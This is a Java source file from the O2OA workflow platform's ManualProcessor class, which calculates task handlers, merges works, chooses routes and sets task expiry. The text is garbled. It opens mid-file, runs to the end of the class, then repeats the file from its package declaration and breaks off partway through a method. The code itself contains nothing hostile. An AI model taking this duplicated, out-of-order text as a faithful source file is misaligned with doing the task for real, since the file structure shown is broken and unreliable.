com.x.processplatform.service.processing.Business; import com.x.processplatform.service.processing.processor.AeiObjects; /** * @author Zhou Rui */ public class ManualProcessor extends AbstractManualProcessor { private static Logger logger = LoggerFactory.getLogger(ManualProcessor.class); public ManualProcessor(EntityManagerContainer entityManagerContainer) throws Exception { super(entityManagerContainer); } @Override protected Work arriving(AeiObjects aeiObjects, Manual manual) throws Exception { // 发送ProcessingSignal aeiObjects.getProcessingAttributes().push(Signal.manualArrive(aeiObjects.getWork().getActivityToken(), manual)); // 根据manual计算出来的活动处理人 List<String> identities = calculateTaskIdentities(aeiObjects, manual); // 启用同类工作相同活动节点合并,如果有合并的工作,那么直接返回这个工作. Work merge = this.arrivingMergeSameJob(aeiObjects, manual, identities); if (null != merge) { return merge; } this.arrivingPassSame(aeiObjects, identities); aeiObjects.getWork().setManualTaskIdentityList(new ArrayList<>(identities)); return aeiObjects.getWork(); } private Work arrivingMergeSameJob(AeiObjects aeiObjects, Manual manual, List<String> identities) throws Exception { if (!BooleanUtils.isTrue(manual.getManualMergeSameJobActivity())) { return null; } List<String> exists = this.arriving_sameJobActivityExistIdentities(aeiObjects, manual); if (ListTools.isNotEmpty(exists)) { Work other = aeiObjects.getWorks().stream().filter(o -> { return StringUtils.equals(aeiObjects.getWork().getJob(), o.getJob()) && StringUtils.equals(aeiObjects.getWork().getActivity(), o.getActivity()) && (!Objects.equals(aeiObjects.getWork(), o)); }).findFirst().orElse(null); if (null != other) { identities.removeAll(exists); if (ListTools.isEmpty(identities)) { this.mergeTaskCompleted(aeiObjects, aeiObjects.getWork(), other); this.mergeRead(aeiObjects, aeiObjects.getWork(), other); this.mergeReadCompleted(aeiObjects, aeiObjects.getWork(), other); this.mergeReview(aeiObjects, aeiObjects.getWork(), other); this.mergeAttachment(aeiObjects, aeiObjects.getWork(), other); this.mergeWorkLog(aeiObjects, aeiObjects.getWork(), other); if (ListTools.size(aeiObjects.getWork().getSplitTokenList()) > ListTools .size(other.getSplitTokenList())) { other.setSplitTokenList(aeiObjects.getWork().getSplitTokenList()); other.setSplitToken(aeiObjects.getWork().getSplitToken()); other.setSplitValue(aeiObjects.getWork().getSplitValue()); other.setSplitting(true); } aeiObjects.getUpdateWorks().add(other); aeiObjects.getDeleteWorks().add(aeiObjects.getWork()); return other; } } } return null; } private void arrivingPassSame(AeiObjects aeiObjects, List<String> identities) throws Exception { // 查找是否有passSameTarget设置 Route route = aeiObjects.getRoutes().stream().filter(o -> BooleanUtils.isTrue(o.getPassSameTarget())) .findFirst().orElse(null); // 如果有passSameTarget,有到达ArriveWorkLog,不是调度到这个节点的 if ((null != route) && ((null != aeiObjects.getArriveWorkLog(aeiObjects.getWork()))) && (!aeiObjects.getProcessingAttributes().ifForceJoinAtArrive())) { WorkLog workLog = findPassSameTargetWorkLog(aeiObjects); logger.debug("pass same target work:{}, workLog:{}.", aeiObjects.getWork(), workLog); if (null == workLog) { return; } for (TaskCompleted o : aeiObjects.getJoinInquireTaskCompleteds()) { if (StringUtils.equals(o.getActivityToken(), workLog.getArrivedActivityToken())) { List<String> values = ListUtils.intersection(identities, aeiObjects.business().organization().identity().listWithPerson(o.getPerson())); if (!values.isEmpty()) { TaskCompleted obj = new TaskCompleted(aeiObjects.getWork(), route, o); obj.setIdentity(values.get(0)); obj.setUnit(aeiObjects.business().organization().unit().getWithIdentity(obj.getIdentity())); obj.setProcessingType(TaskCompleted.PROCESSINGTYPE_SAMETARGET); obj.setRouteName(route.getName()); Date now = new Date(); obj.setStartTime(now); obj.setStartTimeMonth(DateTools.format(now, DateTools.format_yyyyMM)); obj.setCompletedTime(now); obj.setCompletedTimeMonth(DateTools.format(now, DateTools.format_yyyyMM)); obj.setDuration(0L); obj.setExpired(false); obj.setExpireTime(null); obj.setTask(null); obj.setLatest(true); aeiObjects.getCreateTaskCompleteds().add(obj); } } } } } // 计算处理人 private List<String> calculateTaskIdentities(AeiObjects aeiObjects, Manual manual) throws Exception { TaskIdentities taskIdentities = new TaskIdentities(); // 先计算强制处理人 if (!aeiObjects.getWork().getProperties().getManualForceTaskIdentityList().isEmpty()) { List<String> identities = new ArrayList<>(); identities.addAll(aeiObjects.getWork().getProperties().getManualForceTaskIdentityList()); identities = aeiObjects.business().organization().identity().list(identities); if (ListTools.isNotEmpty(identities)) { taskIdentities.addIdentities(identities); } } // 计算退回的结果 if (taskIdentities.isEmpty()) { Route route = aeiObjects.business().element().get(aeiObjects.getWork().getDestinationRoute(), Route.class); if ((null != route) && (StringUtils.equals(route.getType(), Route.TYPE_BACK))) { List<String> identities = new ArrayList<>(); List<WorkLog> workLogs = new ArrayList<>(); workLogs.addAll(aeiObjects.getUpdateWorkLogs()); workLogs.addAll(aeiObjects.getCreateWorkLogs()); for (WorkLog o : aeiObjects.getWorkLogs()) { if (!workLogs.contains(o)) { workLogs.add(o); } } WorkLogTree tree = new WorkLogTree(workLogs); Node node = tree.location(aeiObjects.getWork()); if (null != node) { for (Node n : tree.up(node)) { if (StringUtils.equals(manual.getId(), n.getWorkLog().getFromActivity())) { for (TaskCompleted t : aeiObjects.getTaskCompleteds()) { if (StringUtils.equals(n.getWorkLog().getFromActivityToken(), t.getActivityToken()) && BooleanUtils.isTrue(t.getJoinInquire())) { identities.add(t.getIdentity()); } } break; } } identities = aeiObjects.business().organization().identity().list(identities); if (ListTools.isNotEmpty(identities)) { taskIdentities.addIdentities(identities); } } } } if (taskIdentities.isEmpty()) { taskIdentities = TranslateTaskIdentityTools.translate(aeiObjects, manual); this.ifTaskIdentitiesEmptyForceToCreatorOrMaintenance(aeiObjects, manual, taskIdentities); this.writeToEmpowerMap(aeiObjects, taskIdentities); } return taskIdentities.identities(); } // 如果活动没有找到任何可用的处理人,那么强制设置处理人为文档创建者,或者配置的 maintenanceIdentity private void ifTaskIdentitiesEmptyForceToCreatorOrMaintenance(AeiObjects aeiObjects, Manual manual, TaskIdentities taskIdentities) throws Exception { if (taskIdentities.isEmpty()) { String identity = aeiObjects.business().organization().identity() .get(aeiObjects.getWork().getCreatorIdentity()); if (StringUtils.isNotEmpty(identity)) { logger.info("{}[{}]未能找到指定的处理人, 标题:{}, id:{}, 强制指定处理人为活动的创建身份:{}.", aeiObjects.getProcess().getName(), manual.getName(), aeiObjects.getWork().getTitle(), aeiObjects.getWork().getId(), identity); taskIdentities.addIdentity(identity); } else { identity = aeiObjects.business().organization().identity() .get(Config.processPlatform().getMaintenanceIdentity()); if (StringUtils.isNotEmpty(identity)) { logger.info("{}[{}]未能找到指定的处理人, 也没有能找到工作创建人, 标题:{}, id:{}, 强制指定处理人为系统维护身份:{}.", aeiObjects.getProcess().getName(), manual.getName(), aeiObjects.getWork().getTitle(), aeiObjects.getWork().getId(), identity); taskIdentities.addIdentity(identity); } else { throw new ExceptionExpectedEmpty(aeiObjects.getWork().getTitle(), aeiObjects.getWork().getId(), aeiObjects.getActivity().getName(), aeiObjects.getActivity().getId()); } } } } // 更新授权,通过surface创建且workThroughManual=false 代表是草稿,那么不需要授权. private void writeToEmpowerMap(AeiObjects aeiObjects, TaskIdentities taskIdentities) throws Exception { // 先清空EmpowerMap aeiObjects.getWork().getProperties().setManualEmpowerMap(new LinkedHashMap<String, String>()); if (!(StringUtils.equals(aeiObjects.getWork().getWorkCreateType(), Work.WORKCREATETYPE_SURFACE) && BooleanUtils.isFalse(aeiObjects.getWork().getWorkThroughManual()))) { List<String> values = taskIdentities.identities(); values = ListUtils.subtract(values, aeiObjects.getProcessingAttributes().getIgnoreEmpowerIdentityList()); taskIdentities.empower(aeiObjects.business().organization().empower().listWithIdentityObject( aeiObjects.getWork().getApplication(), aeiObjects.getProcess().getEdition(), aeiObjects.getWork().getProcess(), aeiObjects.getWork().getId(), values)); for (TaskIdentity taskIdentity : taskIdentities) { if (StringUtils.isNotEmpty(taskIdentity.getFromIdentity())) { aeiObjects.getWork().getProperties().getManualEmpowerMap().put(taskIdentity.getIdentity(), taskIdentity.getFromIdentity()); } } } } private WorkLog findPassSameTargetWorkLog(AeiObjects aeiObjects) throws Exception { WorkLogTree tree = new WorkLogTree(aeiObjects.getWorkLogs()); List<WorkLog> parents = tree.parents(aeiObjects.getArriveWorkLog(aeiObjects.getWork())); logger.debug("pass same target rollback parents:{}.", parents); WorkLog workLog = null; for (WorkLog o : parents) { if (Objects.equals(ActivityType.manual, o.getArrivedActivityType())) { workLog = o; break; } else if (Objects.equals(ActivityType.choice, o.getArrivedActivityType())) { continue; } else if (Objects.equals(ActivityType.agent, o.getArrivedActivityType())) { continue; } else if (Objects.equals(ActivityType.invoke, o.getArrivedActivityType())) { continue; } else if (Objects.equals(ActivityType.service, o.getArrivedActivityType())) { continue; } else { break; } } logger.debug("pass same target find workLog:{}.", workLog); return workLog; } @Override protected void arrivingCommitted(AeiObjects aeiObjects, Manual manual) throws Exception { // nothing } @Override protected List<Work> executing(AeiObjects aeiObjects, Manual manual) throws Exception { List<Work> results = new ArrayList<>(); boolean passThrough = false; // 找到在当前环节已经处理过的已办 List<TaskCompleted> taskCompleteds = aeiObjects.getJoinInquireTaskCompleteds().stream() .filter(o -> StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken())) .collect(Collectors.toList()); // 去掉已经处理过的身份 List<String> identities = ListUtils.subtract(aeiObjects.getWork().getManualTaskIdentityList(), ListTools.extractProperty(taskCompleteds, TaskCompleted.identity_FIELDNAME, String.class, true, true)); identities = aeiObjects.business().organization().identity().list(identities); // 现在处理人为空且没有参与流转的已办 if (identities.isEmpty() && taskCompleteds.isEmpty()) { identities = calculateTaskIdentities(aeiObjects, manual); logger.info("工作设置的处理人已经全部无效,重新计算当前环节所有处理人进行处理,标题:{}, id:{}, 设置的处理人:{}.", aeiObjects.getWork().getTitle(), aeiObjects.getWork().getId(), identities); // 后面进行了identitis.remove()这里必须用一个新对象包装 aeiObjects.getWork().setManualTaskIdentityList(new ArrayList<>(identities)); } // 发送ProcessingSignal aeiObjects.getProcessingAttributes().push(Signal.manualExecute(aeiObjects.getWork().getActivityToken(), manual, Objects.toString(manual.getManualMode(), ""), identities)); switch (manual.getManualMode()) { case single: passThrough = this.single(aeiObjects, manual, identities); break; case parallel: passThrough = this.parallel(aeiObjects, manual, identities); break; case queue: passThrough = this.queue(aeiObjects, manual, identities); break; case grab: passThrough = this.single(aeiObjects, manual, identities); break; default: throw new ExceptionManualModeError(manual.getId()); } if (passThrough) { results.add(aeiObjects.getWork()); } return results; } @Override protected void executingCommitted(AeiObjects aeiObjects, Manual manual) throws Exception { // nothing } @Override protected List<Route> inquiring(AeiObjects aeiObjects, Manual manual) throws Exception { // 发送ProcessingSignal aeiObjects.getProcessingAttributes() .push(Signal.manualInquire(aeiObjects.getWork().getActivityToken(), manual)); List<Route> results = new ArrayList<>(); // 仅有单条路由 if (aeiObjects.getRoutes().size() == 1) { results.add(aeiObjects.getRoutes().get(0)); } else if (aeiObjects.getRoutes().size() > 1) { // 存在多条路由 List<TaskCompleted> taskCompletedList = aeiObjects.getJoinInquireTaskCompleteds().stream() .filter(o -> StringUtils.equals(o.getActivityToken(), aeiObjects.getWork().getActivityToken()) && aeiObjects.getWork().getManualTaskIdentityList().contains(o.getIdentity())) .collect(Collectors.toList()); String name = this.choiceRouteName(taskCompletedList, aeiObjects.getRoutes()); for (Route o : aeiObjects.getRoutes()) { if (o.getName().equalsIgnoreCase(name)) { results.add(o); break; } } } if (!results.isEmpty()) { // 清理掉强制的指定的处理人 aeiObjects.getWork().getProperties().setManualForceTaskIdentityList(new ArrayList<String>()); } return results; } // 通过已办存根选择某条路由 private String choiceRouteName(List<TaskCompleted> list, List<Route> routes) throws Exception { String result = ""; List<String> names = new ArrayList<>(); ListTools.trim(list, false, false).stream().forEach(o -> names.add(o.getRouteName())); // 进行优先路由的判断 Route soleRoute = routes.stream().filter(o -> BooleanUtils.isTrue(o.getSole())).findFirst().orElse(null); if ((null != soleRoute) && names.contains(soleRoute.getName())) { result = soleRoute.getName(); } else { // 进行默认的策略,选择占比多的 result = maxCountOrLatest(list); } if (StringUtils.isEmpty(result)) { throw new ExceptionChoiceRouteNameError( ListTools.extractProperty(list, JpaObject.id_FIELDNAME, String.class, false, false)); } return result; } private String maxCountOrLatest(List<TaskCompleted> list) { Map<String, List<TaskCompleted>> map = list.stream() .collect(Collectors.groupingBy(TaskCompleted::getRouteName)); Optional<Entry<String, List<TaskCompleted>>> optional = map.entrySet().stream().sorted((o1, o2) -> { int c = o2.getValue().size() - o1.getValue().size(); if (c == 0) { Date d1 = o1.getValue().stream().sorted(Comparator.comparing(TaskCompleted::getCreateTime).reversed()) .findFirst().get().getCreateTime(); Date d2 = o2.getValue().stream().sorted(Comparator.comparing(TaskCompleted::getCreateTime).reversed()) .findFirst().get().getCreateTime(); return ObjectUtils.compare(d2, d1); } else { return c; } }).findFirst(); return optional.isPresent() ? optional.get().getKey() : null; } private boolean single(AeiObjects aeiObjects, Manual manual, List<String> identities) throws Exception { boolean passThrough = false; Long count = aeiObjects.getJoinInquireTaskCompleteds().stream().filter(o -> { if (StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken()) && (identities.contains(o.getIdentity()))) { return true; } else { return false; } }).count(); if (count > 0) { // 已经确定要通过此节点,清除可能是多余的待办 aeiObjects.getTasks().stream().filter(o -> { return StringUtils.equals(aeiObjects.getWork().getId(), o.getWork()); }).forEach(o -> { // 如果启用了将未处理待办转待阅,那么进行转换 if (BooleanUtils.isTrue(manual.getManualUncompletedTaskToRead())) { aeiObjects.getCreateReads() .add(new Read(aeiObjects.getWork(), o.getIdentity(), o.getUnit(), o.getPerson())); } aeiObjects.deleteTask(o); }); // 所有预计的处理人中已经有已办,这个环节已经产生了已办,可以离开换个环节。 passThrough = true; } else { // 取到期望的待办人员,由于要进行处理需要转换成可读写List if (ListTools.isEmpty(identities)) { throw new ExceptionExpectedEmpty(aeiObjects.getWork().getTitle(), aeiObjects.getWork().getId(), manual.getName(), manual.getId()); } // 删除多余的待办 aeiObjects.getTasks().stream() .filter(o -> StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken()) && (!ListTools.contains(identities, o.getIdentity()))) .forEach(aeiObjects::deleteTask); // 将待办已经产生的人从预期值中删除 aeiObjects.getTasks().stream() .filter(o -> StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken()) && (ListTools.contains(identities, o.getIdentity()))) .forEach(o -> identities.remove(o.getIdentity())); // 这里剩余的应该是没有生成待办的人员 if (!identities.isEmpty()) { for (String identity : identities) { aeiObjects.createTask(this.createTask(aeiObjects, manual, identity)); } } } return passThrough; } private boolean parallel(AeiObjects aeiObjects, Manual manual, List<String> identities) throws Exception { boolean passThrough = false; // 取得本环节已经处理的已办 List<TaskCompleted> taskCompleteds = this.listJoinInquireTaskCompleted(aeiObjects, identities); // 存在优先路由,如果有人选择了优先路由那么直接流转.需要判断是否启用了soleDirect Route soleRoute = aeiObjects.getRoutes().stream() .filter(r -> BooleanUtils.isTrue(r.getSole()) && BooleanUtils.isTrue(r.getSoleDirect())).findFirst() .orElse(null); if (null != soleRoute) { TaskCompleted soleTaskCompleted = taskCompleteds.stream() .filter(t -> BooleanUtils.isTrue(t.getJoinInquire()) && StringUtils.equals(t.getRouteName(), soleRoute.getName())) .findFirst().orElse(null); if (null != soleTaskCompleted) { this.parallelSoleTaskCompleted(aeiObjects); return true; } } // 将已经处理的人从期望值中移除 aeiObjects.getJoinInquireTaskCompleteds().stream().filter(o -> { return StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken()); }).forEach(o -> identities.remove(o.getIdentity())); // 清空可能的多余的待办 aeiObjects.getTasks().stream().filter(o -> { return StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken()) && (!ListTools.contains(identities, o.getIdentity())); }).forEach(aeiObjects::deleteTask); if (identities.isEmpty()) { // 所有人已经处理完成。 passThrough = true; } else { passThrough = false; // 先清空已经有待办的身份 aeiObjects.getTasks().stream() .filter(o -> StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken())) .forEach(o -> identities.remove(o.getIdentity())); // 这里剩余的应该是没有生成待办的人员 if (!identities.isEmpty()) { for (String identity : identities) { aeiObjects.createTask(this.createTask(aeiObjects, manual, identity)); } } } return passThrough; } // 并行环节下如果有优先路由,那么直接走优先路由,处理的时候需要晴空所有代办 private void parallelSoleTaskCompleted(AeiObjects aeiObjects) throws Exception { // 清空可能的多余的待办 aeiObjects.getTasks().stream().filter(o -> { return StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken()); }).forEach(aeiObjects::deleteTask); } private boolean queue(AeiObjects aeiObjects, Manual manual, List<String> identities) throws Exception { boolean passThrough = false; List<TaskCompleted> taskCompleteds = this.listJoinInquireTaskCompleted(aeiObjects, identities); // 存在优先路由 Route soleRoute = aeiObjects.getRoutes().stream().filter(r -> BooleanUtils.isTrue(r.getSole())).findFirst() .orElse(null); if (null != soleRoute) { TaskCompleted soleTaskCompleted = taskCompleteds.stream() .filter(t -> BooleanUtils.isTrue(t.getJoinInquire()) && StringUtils.equals(t.getRouteName(), soleRoute.getName())) .findFirst().orElse(null); if (null != soleTaskCompleted) { return true; } } // 存在优先路由结束 // 将已经处理的人从期望值中移除 for (TaskCompleted o : taskCompleteds) { identities.remove(o.getIdentity()); } if (identities.isEmpty()) { // 所有人已经处理完成。 passThrough = true; } else { passThrough = false; String identity = identities.get(0); // 还有人没有处理,开始判断待办,取到本环节的所有待办,理论上只能有一条待办 boolean find = false; for (Task t : aeiObjects.getTasks()) { if (StringUtils.equals(aeiObjects.getWork().getActivityToken(), t.getActivityToken())) { if (!StringUtils.equals(t.getIdentity(), identity)) { aeiObjects.deleteTask(t); } else { find = true; } } } // 当前处理人没有待办 if (!find) { aeiObjects.createTask(this.createTask(aeiObjects, manual, identity)); } } return passThrough; } // 所有有效的已办,去除 reset,retract,appendTask private List<TaskCompleted> listJoinInquireTaskCompleted(AeiObjects aeiObjects, List<String> identities) throws Exception { return aeiObjects.getJoinInquireTaskCompleteds().stream() .filter(o -> StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken()) && identities.contains(o.getIdentity()) && BooleanUtils.isTrue(o.getJoinInquire())) .collect(Collectors.toList()); } @Override protected void inquiringCommitted(AeiObjects aeiObjects, Manual manual) throws Exception { // nothing } private void calculateExpire(AeiObjects aeiObjects, Manual manual, Task task) throws Exception { if (null != manual.getTaskExpireType()) { switch (manual.getTaskExpireType()) { case never: this.expireNever(task); break; case appoint: this.expireAppoint(manual, task); break; case script: this.expireScript(aeiObjects, manual, task); break; default: break; } } // 如果work有截至时间 if (null != aeiObjects.getWork().getExpireTime()) { if (null == task.getExpireTime()) { task.setExpireTime(aeiObjects.getWork().getExpireTime()); } else { if (task.getExpireTime().after(aeiObjects.getWork().getExpireTime())) { task.setExpireTime(aeiObjects.getWork().getExpireTime()); } } } // 已经有过期时间了,那么设置催办时间 if (null != task.getExpireTime()) { task.setUrgeTime(DateUtils.addHours(task.getExpireTime(), -2)); } else { task.setExpired(false); task.setUrgeTime(null); task.setUrged(false); } } // 从不过期 private void expireNever(Task task) { task.setExpireTime(null); } private void expireAppoint(Manual manual, Task task) throws Exception { if (BooleanUtils.isTrue(manual.getTaskExpireWorkTime())) { this.expireAppointWorkTime(task, manual); } else { this.expireAppointNaturalDay(task, manual); } } private void expireAppointWorkTime(Task task, Manual manual) throws Exception { Integer m = 0; WorkTime wt = new WorkTime(); if (BooleanUtils.isTrue(NumberTools.greaterThan(manual.getTaskExpireDay(), 0))) { m += manual.getTaskExpireDay() * wt.minutesOfWorkDay(); } if (BooleanUtils.isTrue(NumberTools.greaterThan(manual.getTaskExpireHour(), 0))) { m += manual.getTaskExpireHour() * 60; } if (m > 0) { Date expire = wt.forwardMinutes(new Date(), m); task.setExpireTime(expire); } else { task.setExpireTime(null); } } private void expireAppointNaturalDay(Task task, Manual manual) throws Exception { Integer m = 0; if (BooleanUtils.isTrue(NumberTools.greaterThan(manual.getTaskExpireDay(), 0))) { m += manual.getTaskExpireDay() * 60 * 24; } if (BooleanUtils.isTrue(NumberTools.greaterThan(manual.getTaskExpireHour(), 0))) { m += manual.getTaskExpireHour() * 60; } if (m > 0) { Calendar cl = Calendar.getInstance(); cl.add(Calendar.MINUTE, m); task.setExpireTime(cl.getTime()); } else { task.setExpireTime(null); } } private void expireScript(AeiObjects aeiObjects, Manual manual, Task task) throws Exception { ExpireScriptResult expire = new ExpireScriptResult(); ScriptContext scriptContext = aeiObjects.scriptContext(); Bindings bindings = scriptContext.getBindings(ScriptContext.ENGINE_SCOPE); bindings.put(ScriptFactory.BINDING_NAME_TASK, task); bindings.put(ScriptFactory.BINDING_NAME_EXPIRE, expire); // 重新注入对象需要重新运行 ScriptFactory.initialScriptText().eval(scriptContext); aeiObjects.business().element() .getCompiledScript(aeiObjects.getWork().getApplication(), manual, Business.EVENT_MANUALTASKEXPIRE) .eval(scriptContext); if (BooleanUtils.isTrue(NumberTools.greaterThan(expire.getWorkHour(), 0))) { Integer m = 0; m += expire.getWorkHour() * 60; if (m > 0) { WorkTime wt = new WorkTime(); task.setExpireTime(wt.forwardMinutes(new Date(), m)); } else { task.setExpireTime(null); } } else if (BooleanUtils.isTrue(NumberTools.greaterThan(expire.getHour(), 0))) { Integer m = 0; m += expire.getHour() * 60; if (m > 0) { Calendar cl = Calendar.getInstance(); cl.add(Calendar.MINUTE, m); task.setExpireTime(cl.getTime()); } else { task.setExpireTime(null); } } else if (null != expire.getDate()) { task.setExpireTime(expire.getDate()); } else { task.setExpireTime(null); } } private Task createTask(AeiObjects aeiObjects, Manual manual, String identity) throws Exception { String fromIdentity = aeiObjects.getWork().getProperties().getManualEmpowerMap().get(identity); String person = aeiObjects.business().organization().person().getWithIdentity(identity); String unit = aeiObjects.business().organization().unit().getWithIdentity(identity); Task task = new Task(aeiObjects.getWork(), identity, person, unit, fromIdentity, new Date(), null, aeiObjects.getRoutes(), manual.getAllowRapid()); // 是第一条待办,进行标记 task.setFirst(ListTools.isEmpty(aeiObjects.getJoinInquireTaskCompleteds())); this.calculateExpire(aeiObjects, manual, task); if (StringUtils.isNotEmpty(fromIdentity)) { aeiObjects.business().organization().empowerLog() .log(this.createEmpowerLog(aeiObjects.getWork(), fromIdentity, identity)); String fromPerson = aeiObjects.business().organization().person().getWithIdentity(fromIdentity); String fromUnit = aeiObjects.business().organization().unit().getWithIdentity(fromIdentity); TaskCompleted empowerTaskCompleted = new TaskCompleted(aeiObjects.getWork()); empowerTaskCompleted.setProcessingType(TaskCompleted.PROCESSINGTYPE_EMPOWER); empowerTaskCompleted.setIdentity(fromIdentity); empowerTaskCompleted.setUnit(fromUnit); empowerTaskCompleted.setPerson(fromPerson); empowerTaskCompleted.setEmpowerToIdentity(identity); aeiObjects.createTaskCompleted(empowerTaskCompleted); Read empowerRead = new Read(aeiObjects.getWork(), fromIdentity, fromUnit, fromPerson); aeiObjects.createRead(empowerRead); } return task; } private EmpowerLog createEmpowerLog(Work work, String fromIdentity, String toIdentity) { return new EmpowerLog().setApplication(work.getApplication()).setApplicationAlias(work.getApplicationAlias()) .setApplicationName(work.getApplicationName()).setProcess(work.getProcess()) .setProcessAlias(work.getProcessAlias()).setProcessName(work.getProcessName()).setTitle(work.getTitle()) .setWork(work.getId()).setJob(work.getJob()).setFromIdentity(fromIdentity).setToIdentity(toIdentity) .setActivity(work.getActivity()).setActivityAlias(work.getActivityAlias()) .setActivityName(work.getActivityName()).setEmpowerTime(new Date()); } private List<String> arriving_sameJobActivityExistIdentities(AeiObjects aeiObjects, Manual manual) throws Exception { List<String> exists = new ArrayList<>(); aeiObjects.getTasks().stream().filter(o -> { return StringUtils.equals(o.getActivity(), manual.getId()) && StringUtils.equals(o.getJob(), aeiObjects.getWork().getJob()); }).forEach(o -> exists.add(o.getIdentity())); return exists; } public class ExpireScriptResult { Integer hour; Integer workHour; Date date; public Integer getHour() { return hour; } public void setHour(Integer hour) { this.hour = hour; } public Integer getWorkHour() { return workHour; } public void setWorkHour(Integer workHour) { this.workHour = workHour; } public Date getDate() { return date; } public void setDate(Date date) { this.date = date; } public void setDate(String str) { try { this.date = DateTools.parse(str); } catch (Exception e) { logger.error(e); } } } }
o2server/x_processplatform_service_processing/src/main/java/com/x/processplatform/service/processing/processor/manual/ManualProcessor.java
package com.x.processplatform.service.processing.processor.manual; import java.util.ArrayList; import java.util.Calendar; import java.util.Comparator; import java.util.Date; import java.util.LinkedHashMap; import java.util.List; import java.util.Map; import java.util.Map.Entry; import java.util.Objects; import java.util.Optional; import java.util.stream.Collectors; import javax.script.Bindings; import javax.script.ScriptContext; import org.apache.commons.collections4.ListUtils; import org.apache.commons.lang3.BooleanUtils; import org.apache.commons.lang3.ObjectUtils; import org.apache.commons.lang3.StringUtils; import org.apache.commons.lang3.time.DateUtils; import com.x.base.core.container.EntityManagerContainer; import com.x.base.core.entity.JpaObject; import com.x.base.core.project.config.Config; import com.x.base.core.project.logger.Logger; import com.x.base.core.project.logger.LoggerFactory; import com.x.base.core.project.organization.EmpowerLog; import com.x.base.core.project.script.ScriptFactory; import com.x.base.core.project.tools.DateTools; import com.x.base.core.project.tools.ListTools; import com.x.base.core.project.tools.NumberTools; import com.x.base.core.project.utils.time.WorkTime; import com.x.processplatform.core.entity.content.Read; import com.x.processplatform.core.entity.content.Task; import com.x.processplatform.core.entity.content.TaskCompleted; import com.x.processplatform.core.entity.content.Work; import com.x.processplatform.core.entity.content.WorkLog; import com.x.processplatform.core.entity.element.ActivityType; import com.x.processplatform.core.entity.element.Manual; import com.x.processplatform.core.entity.element.Route; import com.x.processplatform.core.entity.element.util.WorkLogTree; import com.x.processplatform.core.entity.element.util.WorkLogTree.Node; import com.x.processplatform.core.entity.log.Signal; import com.x.processplatform.service.processing.Business; import com.x.processplatform.service.processing.processor.AeiObjects; /** * @author Zhou Rui */ public class ManualProcessor extends AbstractManualProcessor { private static Logger logger = LoggerFactory.getLogger(ManualProcessor.class); public ManualProcessor(EntityManagerContainer entityManagerContainer) throws Exception { super(entityManagerContainer); } @Override protected Work arriving(AeiObjects aeiObjects, Manual manual) throws Exception { // 发送ProcessingSignal aeiObjects.getProcessingAttributes().push(Signal.manualArrive(aeiObjects.getWork().getActivityToken(), manual)); // 根据manual计算出来的活动处理人 List<String> identities = calculateTaskIdentities(aeiObjects, manual); // 启用同类工作相同活动节点合并,如果有合并的工作,那么直接返回这个工作. Work merge = this.arrivingMergeSameJob(aeiObjects, manual, identities); if (null != merge) { return merge; } this.arrivingPassSame(aeiObjects, identities); aeiObjects.getWork().setManualTaskIdentityList(new ArrayList<>(identities)); return aeiObjects.getWork(); } private Work arrivingMergeSameJob(AeiObjects aeiObjects, Manual manual, List<String> identities) throws Exception { if (!BooleanUtils.isTrue(manual.getManualMergeSameJobActivity())) { return null; } List<String> exists = this.arriving_sameJobActivityExistIdentities(aeiObjects, manual); if (ListTools.isNotEmpty(exists)) { Work other = aeiObjects.getWorks().stream().filter(o -> { return StringUtils.equals(aeiObjects.getWork().getJob(), o.getJob()) && StringUtils.equals(aeiObjects.getWork().getActivity(), o.getActivity()) && (!Objects.equals(aeiObjects.getWork(), o)); }).findFirst().orElse(null); if (null != other) { identities.removeAll(exists); if (ListTools.isEmpty(identities)) { this.mergeTaskCompleted(aeiObjects, aeiObjects.getWork(), other); this.mergeRead(aeiObjects, aeiObjects.getWork(), other); this.mergeReadCompleted(aeiObjects, aeiObjects.getWork(), other); this.mergeReview(aeiObjects, aeiObjects.getWork(), other); this.mergeAttachment(aeiObjects, aeiObjects.getWork(), other); this.mergeWorkLog(aeiObjects, aeiObjects.getWork(), other); if (ListTools.size(aeiObjects.getWork().getSplitTokenList()) > ListTools .size(other.getSplitTokenList())) { other.setSplitTokenList(aeiObjects.getWork().getSplitTokenList()); other.setSplitToken(aeiObjects.getWork().getSplitToken()); other.setSplitValue(aeiObjects.getWork().getSplitValue()); other.setSplitting(true); } aeiObjects.getUpdateWorks().add(other); aeiObjects.getDeleteWorks().add(aeiObjects.getWork()); return other; } } } return null; } private void arrivingPassSame(AeiObjects aeiObjects, List<String> identities) throws Exception { // 查找是否有passSameTarget设置 Route route = aeiObjects.getRoutes().stream().filter(o -> BooleanUtils.isTrue(o.getPassSameTarget())) .findFirst().orElse(null); // 如果有passSameTarget,有到达ArriveWorkLog,不是调度到这个节点的 if ((null != route) && ((null != aeiObjects.getArriveWorkLog(aeiObjects.getWork()))) && (!aeiObjects.getProcessingAttributes().ifForceJoinAtArrive())) { WorkLog workLog = findPassSameTargetWorkLog(aeiObjects); logger.debug("pass same target work:{}, workLog:{}.", aeiObjects.getWork(), workLog); if (null == workLog) { return; } for (TaskCompleted o : aeiObjects.getJoinInquireTaskCompleteds()) { if (StringUtils.equals(o.getActivityToken(), workLog.getArrivedActivityToken())) { List<String> values = ListUtils.intersection(identities, aeiObjects.business().organization().identity().listWithPerson(o.getPerson())); if (!values.isEmpty()) { TaskCompleted obj = new TaskCompleted(aeiObjects.getWork(), route, o); obj.setIdentity(values.get(0)); obj.setUnit(aeiObjects.business().organization().unit().getWithIdentity(obj.getIdentity())); obj.setProcessingType(TaskCompleted.PROCESSINGTYPE_SAMETARGET); obj.setRouteName(route.getName()); Date now = new Date(); obj.setStartTime(now); obj.setStartTimeMonth(DateTools.format(now, DateTools.format_yyyyMM)); obj.setCompletedTime(now); obj.setCompletedTimeMonth(DateTools.format(now, DateTools.format_yyyyMM)); obj.setDuration(0L); obj.setExpired(false); obj.setExpireTime(null); obj.setTask(null); obj.setLatest(true); aeiObjects.getCreateTaskCompleteds().add(obj); } } } } } // 计算处理人 private List<String> calculateTaskIdentities(AeiObjects aeiObjects, Manual manual) 